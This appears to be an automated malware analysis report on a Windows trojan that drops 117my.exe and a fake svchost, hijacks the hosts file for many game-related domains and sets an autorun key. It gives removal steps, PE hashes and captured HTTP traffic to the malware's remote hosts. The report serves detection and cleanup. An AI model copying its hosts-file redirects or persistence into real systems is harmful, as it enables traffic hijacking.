170.178.171.31 | www.195my.com |
170.178.171.31 | 195my.com |
170.178.171.31 | www.195sy.com |
170.178.171.31 | 195sy.com |
170.178.171.31 | spxwj.com |
170.178.171.31 | 817zs.cn |
170.178.171.31 | mmmmm.cnm78.com |
170.178.171.31 | www.139sfmy.com |
170.178.171.31 | www.gaoji.co |
170.178.171.31 | kkk.5917my.com |
170.178.171.31 | 5917my.com |
170.178.171.31 | cnm78.com |
170.178.171.31 | www.87tf.com |
170.178.171.31 | www.wxycw.com |
170.178.171.31 | zzxyyyz.com |
170.178.171.31 | www.zzxyyyz.com |
170.178.171.31 | www.150my.com |
170.178.171.31 | www.seefp.com |
170.178.171.31 | www.sz-jhled.com |
170.178.171.31 | www.9my.net |
170.178.171.31 | www.92mysf.com |
170.178.171.31 | sogu.173185.net |
170.178.171.31 | 173185.net |
170.178.171.31 | jxkb56.com |
170.178.171.31 | yon.jxkb56.com |
170.178.171.31 | sogou13.170shouyou.com |
170.178.171.31 | www.915my.com |
170.178.171.31 | 915my.com |
170.178.171.31 | www.hao2288.cn |
170.178.171.31 | ddddddd.xckdee.com |
170.178.171.31 | www.173ka.net |
170.178.171.31 | duge.xunleimy.com |
170.178.171.31 | mmmmm.cnm78.com |
170.178.171.31 | kkk.51173wan.com |
170.178.171.31 | www.hao2288.cn |
170.178.171.31 | ddddddd.xckdee.com |
170.178.171.31 | www.173ka.net |
170.178.171.31 | duge.xunleimy.com |
170.178.171.31 | mmmmm.cnm78.com |
170.178.171.31 | kkk.51173wan.com |
170.178.171.31 | 170shouyou.com |
170.178.171.31 | www.173ka.net |
170.178.171.31 | www.58wg.co |
170.178.171.31 | www.58wgw.com |
170.178.171.31 | www.my158.com |
170.178.171.31 | www.huaimy.com |
170.178.171.31 | huaimy.com |
170.178.171.31 | www.dudumy.cn |
170.178.171.31 | www.nmoyu.com |
170.178.171.31 | www.357my.com |
170.178.171.31 | www.139my.com |
170.178.171.31 | www.001my.com |
170.178.171.31 | www.xunleimy.com |
170.178.171.34 | www.117my.com |
170.178.171.31 | www.181my.com |
170.178.171.31 | kkk.51173wan.com |
170.178.171.31 | www.ucbug.com/moyu |
170.178.171.31 | www.zhujiangroad.com |
170.178.171.31 | sss.u8nz.com |
170.178.171.31 | www.xixiwg.com |
170.178.171.31 | www.vdisk.cn |
170.178.171.31 | www.592my.net |
170.178.171.31 | www.581my.com |
170.178.171.31 | www.592wg.cc |
170.178.171.31 | www.moyusifu.com |
170.178.171.31 | www.139myw.com |
170.178.171.31 | www.rmoyu.com |
170.178.171.31 | www.001my.com.co |
170.178.171.31 | www.001my.com.cn |
170.178.171.31 | mmm.139sfmy.com |
170.178.171.31 | my.99.com |
170.178.171.31 | 99.com |
170.178.171.31 | www.tjggg.com |
170.178.171.31 | www.gmoyu.com |
170.178.171.31 | 139sfmy.com |
170.178.171.31 | 770my.com |
170.178.171.31 | www.770my.com |
170.178.171.31 | www.660my.com |
170.178.171.31 | 660my.com |
170.178.171.31 | www.2525my.cn |
170.178.171.31 | tjggg.com |
170.178.171.31 | www.99my.com.co |
170.178.171.31 | www.520jzw.com |
170.178.171.31 | www.70my.com |
170.178.171.31 | www.13moyu.com |
170.178.171.31 | laomy.net |
170.178.171.31 | www1.dlbyhw.com |
170.178.171.31 | dlbyhw.com |
170.178.171.31 | www.clzs888.com |
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
svchostlsp.exe:3736
%original file name%.exe:452
117my.exe:2736
117my.exe:944 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Windows\twain_32\config\ESPI11.dll (244 bytes)
C:\Windows\System32\addressoftext.inscan (1 bytes)
C:\Windows\System32\ESPI11.dll (723 bytes)
C:\Windows\svchost.exe (12649 bytes)
C:\Windows\117my.exe (7296 bytes)
C:\Windows\117my.com.bat (258 bytes)
C:\Windows\Game.ico:Zone.Identifier (26 bytes)
C:\Windows\svchosl.exe (8713 bytes)
C:\Windows\117my.skn (2160 bytes)
C:\Users\"%CurrentUserName%"\Desktop\117éÂâ€Ã¥Å¸Å¸7.1.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YBU4WGCW.txt (103 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\host[1].htm (775 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\117my.exe (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\svchostlsp.exe (1948 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\JpHrc.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\Mag.dat (101 bytes)
C:\Windows\System32\drivers\etc\hosts (39 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\Repairdata.txt (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\117my.skn (62 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\117my.ini (28 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\iat.dll (89 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"xf1" = "C:\Windows\svchosl.exe /start" - Restore the original content of the HOSTS file (%System%\drivers\etc\hosts): 127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 188392 | 188416 | 4.65119 | 2ae181684b1677561119f5765623448e |
.rdata | 192512 | 39376 | 39424 | 3.57169 | 0e0f6a60d8fa917a060c8ef7becc0888 |
.data | 233472 | 129208 | 3072 | 2.28424 | 4e4aa728d9cced1622c2be27733e3fc5 |
.gfids | 364544 | 240 | 512 | 1.47202 | c923099e27bf0e45a5c402d935d0620b |
.rsrc | 368640 | 19884 | 19968 | 4.01107 | 5c996f60fd4566aa444b73d2a69de10c |
.reloc | 389120 | 8076 | 8192 | 4.59547 | d13d3f8a8adfe6861c49a01d81cf73ed |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://passport.n.shifen.com/?business&un=5182235367&from=prin | |
hxxp://www.gxnkw.com/jc/bjcguanjianzi.txt?WebShieldDRSessionVerify=YizhEArCBnQ1QwpILGI0 | |
hxxp://www.gxnkw.com/jc/tongji.txt | |
hxxp://www.gxnkw.com/jc/bjcguanjianzi.txt | |
hxxp://www.gxnkw.com/jc/jcd.txt | |
hxxp://www.92117my.com/host.html | 122.228.30.106 |
hxxp://18201869647.oicp.net/ | |
hxxp://18201869647.oicp.net/favicon.ico | |
hxxp://www.gxnkw.com/jc/hostjc.txt | |
hxxp://www.92117my.com/index1.htm | 122.228.30.106 |
hxxp://www.92117my.com/logo.jpg | 122.228.30.106 |
hxxp://www.92117my.com/game.html | 122.228.30.106 |
hxxp://www.92117my.com/images/new.js | 122.228.30.106 |
hxxp://www.92117my.com/images/xx.css | 122.228.30.106 |
hxxp://www.92117my.com/images/bg.jpg | 122.228.30.106 |
hxxp://www.92117my.com/images/Index_c1_r5.jpg | 122.228.30.106 |
hxxp://www.92117my.com/Images/Index_bottom.jpg | 122.228.30.106 |
hxxp://cdn.globalsigncdn.com/rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH | |
hxxp://cdn.globalsigncdn.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDBisczuS0Hu180XFAA== | |
hxxp://www.92117my.com/favicon.ico | 122.228.30.106 |
hxxp://cdn.globalsigncdn.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDGlwEnDh1Wq84Ev4Sw== | |
hxxp://www.taobao.com.danuoyi.tbcache.com/ | 213.244.178.246 |
hxxp://cdn.globalsigncdn.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDEVLD4SzDqtMG/eBnw== | |
hxxp://www.gxnkw.com/jc/hostjc.txt?WebShieldDRSessionVerify=EMGc17Wrs9kjNC7K8XBq | |
hxxp://gpla1.wac.v2cdn.net/CRL/Omniroot2025.crl | |
hxxp://www.taobao.com/ | 213.244.178.246 |
hxxp://passport.baidu.com/?business&un=5182235367&from=prin | |
hxxp://ocsp.globalsign.com/rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH | 104.16.26.216 |
hxxp://ocsp2.globalsign.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDGlwEnDh1Wq84Ev4Sw== | 104.16.27.216 |
hxxp://www.117my.cc/ | 183.60.204.14 |
hxxp://ocsp2.globalsign.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDBisczuS0Hu180XFAA== | 104.16.27.216 |
hxxp://cdp1.public-trust.com/CRL/Omniroot2025.crl | 93.184.220.20 |
hxxp://www.117my.cc/favicon.ico | 183.60.204.14 |
hxxp://ocsp2.globalsign.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDEVLD4SzDqtMG/eBnw== | 104.16.27.216 |
wg.200my.com | 122.224.48.120 |
s95.cnzz.com | 1.99.192.16 |
z4.cnzz.com | 1.122.192.15 |
world.taobao.com | 213.244.178.246 |
c.cnzz.com | 123.138.67.81 |
cnzz.mmstat.com | 198.11.132.221 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /jc/hostjc.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 302 Found
Server: Safedog/4.0.0
Location: /jc/hostjc.txt?WebShieldDRSessionVerify=EMGc17Wrs9kjNC7K8XBq
Content-Length: 0
Connection: Close
Content-Type: text/html
GET /jc/bjcguanjianzi.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 200
Content-Type: text/plain
Last-Modified: Sun, 08 Jan 2017 11:29:25 GMT
Accept-Ranges: bytes
ETag: "583b2977a269d21:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:41 GMT
....sf......................001my..139my..70..........................................................................001......139..............178................520........................chihuo0517....
GET /jc/jcd.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 32
Content-Type: text/plain
Last-Modified: Thu, 12 Jan 2017 10:59:28 GMT
Accept-Ranges: bytes
ETag: "ca42d5f1c26cd21:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:41 GMT
hXXp://VVV.92117my.com/host.html....
GET /jc/tongji.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/plain
Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT
Accept-Ranges: bytes
ETag: "4c1ca75e9d9d01:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:42 GMT
HTTP/1.1 200 OK..Content-Length: 0..Content-Type: text/plain..Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT..Accept-Ranges: bytes..ETag: "4c1ca75e9d9d01:22a0"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Thu, 19 Jan 2017 00:36:42 GMT..
GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDGlwEnDh1Wq84Ev4Sw== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2017 00:40:40 GMT
Content-Type: application/ocsp-response
Content-Length: 1570
Connection: keep-alive
Set-Cookie: __cfduid=d9bd14783e463ca82c5866086ae2f56f41484786440; expires=Fri, 19-Jan-18 00:40:40 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Wed, 18 Jan 2017 23:26:57 GMT
Expires: Sun, 22 Jan 2017 23:26:57 GMT
ETag: "ce2c9bab38408c822469b28825da8da8a11ff254"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 32363c92e3e24038-SOF
0..........0..... .....0......0...0.......M........u....%...G..20170118232657Z0o0m0E0... ..........M.=......r......{.....a....)S...};..@..|..ip.p..j..K.K....20170118232657Z....20170122232657Z0...*.H.............uO.5......./w;3.....3.J.n...E.....j.i..'...?.n>..J..l.sa......./....@.z..Qh.cc..l[...q.W ...g%.....o...f..."....9..;v_.n..m..!...f@.M...!.Yu.L3'C.6'......saI.G.d'B..b.u.H......_....m.f.Z.....g...DHY.z.O[.|U[o..#.O....0<....h....>...}..m..s....O..........8t...K0..G0..C0.. .......q..}.dc.j..(0...*.H........0f1.0...U....BE1.0...U....GlobalSign nv-sa1<0:..U...3GlobalSign Organization Validation CA - SHA256 - G20...161124031843Z..170224031843Z0..1.0...U....BE1.0...U....GlobalSign nv-sa1.0...U....2016112411281M0K..U...DGlobalSign Organization Validation CA - SHA256 - G2 - OCSP Responder0.."0...*.H.............0.........C..0j..R........0.".e.&.6'.d..._.....8...Y..../..z..-hi.k.......D.........u..>h....T2..~..*;...v.^.!d.......8.p.e..me...>..V...l...P.6.V..G..;X.......12U.)D.E(ldQ...67..@......l...A.>l......m..e;.....n.~..Wb.?..gE.......a.KM.F...}.qo;S...`/..s....6....G.a........0..0...U.......M........u....%...G0...U.#..0.....a....)S...};..@..|0... .....0......0L..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.globalsign.com/repository/0...U...........0...U.%..0... .......0...*.H..............H.....C.Ie....;.yN.'..../?.T..-T.a..4...n..OW/l....[|..-.i../.'..1."......3[...J.....\@.S.=-p..p......d...>~J.|E0y......!.;.c.,...||.V....K..L...dX...a....6'..U..G....A;..........4K...........k.B].
<<< skipped >>>
GET /?business&un=5182235367&from=prin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: passport.baidu.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Connection: keep-alive
Content-Type: text/html
Date: Thu, 19 Jan 2017 00:40:03 GMT
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: Apache
Set-Cookie: BAIDUID=9D02E474B4BC9B1BC9F49E269184DEEF:FG=1; expires=Fri, 19-Jan-18 00:40:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Tracecode: 24029977590332382986011908
Tracecode: 24029977590286507274011908
Vary: Accept-Encoding
Vary: Accept-Encoding
Transfer-Encoding: chunked
3d0..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.<title>........................_5182235367</title>.<link rel="stylesheet" href="/style/v2/info.css?t=20100901" type="text/css" media="all" />.<script type="text/javascript" src="/js/center_accountbind.js?t=20100901"></script>.<script type="text/javascript" src="/js/business.js?t=20100901"></script>.<script language="javascript">. document.domain = "baidu.com";. window.hasSpace = '';. var tabinfo = initTabInfo('5182235367');. var ab=gethash(1);. if(ab>0 && ab<tabinfo.length). {. if(tabinfo[ab][2]=="_blank"). {. window.location=tabinfo[ab][0];. }. }. function fixImgSize(img){... var width = img.offsetWidth;... var height = img.offsetHeight;... if( w..1a65..idth>78 ){... width>height?( img.style.width='78px' ):( img.style.height='78px' );... }else if( height>78 ){... img.style.height='78px';... }.. }. </script>.</head>.<body onLoad="javascript:chgdeftab(0);">. <div class="wrapper">.<noscript>.<p class="nojs">....................................................................................</p>.</noscript>.
<<< skipped >>>
GET /jc/tongji.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/plain
Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT
Accept-Ranges: bytes
ETag: "4c1ca75e9d9d01:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:41 GMT
HTTP/1.1 200 OK..Content-Length: 0..Content-Type: text/plain..Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT..Accept-Ranges: bytes..ETag: "4c1ca75e9d9d01:22a0"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Thu, 19 Jan 2017 00:36:41 GMT......
GET /jc/tongji.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/plain
Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT
Accept-Ranges: bytes
ETag: "4c1ca75e9d9d01:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:49 GMT
HTTP/1.1 200 OK..Content-Length: 0..Content-Type: text/plain..Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT..Accept-Ranges: bytes..ETag: "4c1ca75e9d9d01:22a0"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Thu, 19 Jan 2017 00:36:49 GMT......
GET /jc/tongji.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/plain
Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT
Accept-Ranges: bytes
ETag: "4c1ca75e9d9d01:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:58 GMT
HTTP/1.1 200 OK..Content-Length: 0..Content-Type: text/plain..Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT..Accept-Ranges: bytes..ETag: "4c1ca75e9d9d01:22a0"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Thu, 19 Jan 2017 00:36:58 GMT......
GET /CRL/Omniroot2025.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sat, 16 Nov 2013 06:15:02 GMT
If-None-Match: "200da-5b6-4eb453c33260e"
User-Agent: Microsoft-CryptoAPI/6.1
Host: cdp1.public-trust.com
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-pkcs7-crl
Date: Thu, 19 Jan 2017 00:40:59 GMT
Etag: "200c0-cba-54651a19dc944"
Last-Modified: Tue, 17 Jan 2017 22:15:01 GMT
Server: ECS (arn/45CB)
X-Cache: HIT
Content-Length: 3258
0...0......0...*.H........0Z1.0...U....IE1.0...U....Baltimore1.0...U....CyberTrust1"0 ..U....Baltimore CyberTrust Root..170117212826Z..170414212826Z0...0....'k...120111220757Z0....'k...120111220847Z0....'.C..130130174530Z0....'....130807173059Z0....'....140122185220Z0....'....140212185542Z0....'yr..150701184507Z0....'#...100303201301Z0....''q..100414175202Z0....'L...110224181251Z0....'Pn..110309142119Z0....'....100216203312Z0....'#...100303201213Z0....'3#..100908172555Z0....''n..101208175627Z0....''m..101208175749Z0....''p..101208175916Z0....'H...110114162156Z0#...'X>..110815145134Z0.0...U.......0#...'Z2..110818184101Z0.0...U.......0....'g...120111164333Z0....'g...120111164409Z0....'g...120111164519Z0....'....100216213519Z0....''s..100414175225Z0....''k..100414181839Z0....'3"..100908172705Z0....'3$..100908172728Z0....''o..101208175645Z0....''l..101208175727Z0....'H...110119195142Z0....'Nz..110302154045Z0....'c...111207220933Z0....'g...120111164445Z0....''r..100414175143Z0....'8...101012182723Z0....'e...120111163041Z0....'VJ..110714160903Z0....'s...130123162633Z0....'....130904190524Z0....'....131024214319Z0....'....140129172435Z0....'....140129172453Z0....'....131024214310Z0....'....131101204601Z0....'....140219171632Z0....'.^..140409155638Z0....'i...140709171930Z0....'/:..141119193302Z0....'J...150603184605Z0....'k...150603185020Z0....'k...150603185058Z0....'k...150603185131Z0....'k...120111220827Z0....'8...140716191203Z0....'....131219195909Z0....'....140219171545Z0....'k...151105070000Z0....'q...160126173
<<< skipped >>>
GET /jc/bjcguanjianzi.txt?WebShieldDRSessionVerify=YizhEArCBnQ1QwpILGI0 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: Safedog/4.0.0
Location: /jc/bjcguanjianzi.txt
Content-Length: 0
Connection: Close
Content-Type: text/html
GET /jc/tongji.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/plain
Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT
Accept-Ranges: bytes
ETag: "4c1ca75e9d9d01:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:37:39 GMT
HTTP/1.1 200 OK..Content-Length: 0..Content-Type: text/plain..Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT..Accept-Ranges: bytes..ETag: "4c1ca75e9d9d01:22a0"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Thu, 19 Jan 2017 00:37:39 GMT..
GET / HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.117my.cc
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 228
Content-Type: text/html
Content-Location: hXXp://VVV.117my.cc/index.html
Last-Modified: Mon, 15 Aug 2016 05:17:18 GMT
Accept-Ranges: bytes
ETag: "c85d104bb4f6d11:a7a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:39:59 GMT
..<html>..........117...................2............<script language="javascript"> .. <!-- .. setTimeout("goto()","1000");..function goto(){.. window.location.href = "hXXp://VVV.92117my.com/index1.htm";..}.. -->.. </script>HTTP/1.1 200 OK..Content-Length: 228..Content-Type: text/html..Content-Location: hXXp://VVV.117my.cc/index.html..Last-Modified: Mon, 15 Aug 2016 05:17:18 GMT..Accept-Ranges: bytes..ETag: "c85d104bb4f6d11:a7a"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Thu, 19 Jan 2017 00:39:59 GMT....<html>..........117...................2............<script language="javascript"> .. <!-- .. setTimeout("goto()","1000");..function goto(){.. window.location.href = "hXXp://VVV.92117my.com/index1.htm";..}.. -->.. </script>..
GET /index1.htm HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Referer: hXXp://VVV.117my.cc/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 5219
Content-Type: text/html
Last-Modified: Thu, 12 Jan 2017 13:56:43 GMT
Accept-Ranges: bytes
ETag: "c8d99b5db6cd21:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:39:37 GMT
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />..<title>......117................................................</title>..<meta name="keywords" content="......sf,..................,117......" />..<meta name="description" content="117......sf..................................................................................................................................................." />..<style type="text/css">..body{color:#175095;padding:8px 0;background:#333;}..a{color:#175095;text-decoration:none;}..a:link{color:#175095;text-decoration:none;}..a:hover{color:#e00;text-decoration:none;}..*{padding:0;margin:0;font-size:14px;font-family:'Microsoft Yahei','Lucida Grande',Helvetica,Arial,sans-serif;}..#w{width:1002px;margin:0 auto;padding:8px;background:#fff;-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;-webkit-box-shadow:0 0 8px #000000;-moz-box-shadow:0 0 8px #000000;box-shadow:0 0 8px #000000;}..#logo{height:91px;background:url(logo.jpg) no-repeat;}..#d{margin-top:8px;}..#d table{border-spacing:1px;width:100%;background:#e3f3fe;border:1px solid #95bcd6;}..#d table tr:hover{background:#fff;}..#d td{padding:10px;line-height:15px;text-align:center;border:1px solid #95bcd6;overflow:hidden;white-space:nowrap;}..#k{margin-top:8px;border-top:1
<<< skipped >>>
GET /game.html HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Referer: hXXp://VVV.92117my.com/index1.htm
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 17051
Content-Type: text/html
Last-Modified: Mon, 16 Jan 2017 11:52:03 GMT
Accept-Ranges: bytes
ETag: "cfaef4ee6fd21:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:39:38 GMT
<html>..<HEAD>..<title>117................</title>..<meta http-equiv="Content-Type" content="text/html; charset=gb2312">..<META NAME="keywords" CONTENT="117................">..<META NAME="description" CONTENT="117................">..<META NAME="robots" CONTENT="all">..<script type='text/javascript'>window.mod_pagespeed_start = Number(new Date());</script>..<link rel='stylesheet' href='images/xx.css' type='text/css'>..<script language=javascript src="images/new.js"></script>..<BODY leftMargin=0 topMargin=0>..<TABLE align='center' cellSpacing=0 cellPadding=0 width='100%' border=0>..<TR>..<TD>..<style type="text/css"> ..<!--..body{background:#2B0045 url(images/bg.jpg) no-repeat center 0;font-size:12px;}...about {...height: 38px;width: 310px;font-size: 14px;line-height: normal;font-weight: bolder;font-family: "....";position: absolute;.left: auto;top: 96px;text-align: left;}...logo{width:980px;height:120px;position:absolute;left:261px;top:23px;}...logo a{width:980px;height:120px;display:block;position:inherit;text-indent:-9999px;}.....-->...aboutqq {...height: 28px;width: 310px;font-size: 14px;line-height: normal;font-weight: bolder;font-family: "....";position: absolute;.left: auto;top: 76px;text-align: left;}...logo{width:980px;height:130px;position:absolute;left:201px;top:13px;}...logo a{width:980px;height:130px;display:block;position:inherit;text-indent:-9999px;}.. .. ...banner{width:984px;margin:0
<<< skipped >>>
GET /images/bg.jpg HTTP/1.1
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://VVV.92117my.com/game.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.92117my.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 47783
Content-Type: image/jpeg
Last-Modified: Wed, 01 Jul 2015 07:57:44 GMT
Accept-Ranges: bytes
ETag: "08c919cd3b3d01:3fe"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:39:39 GMT
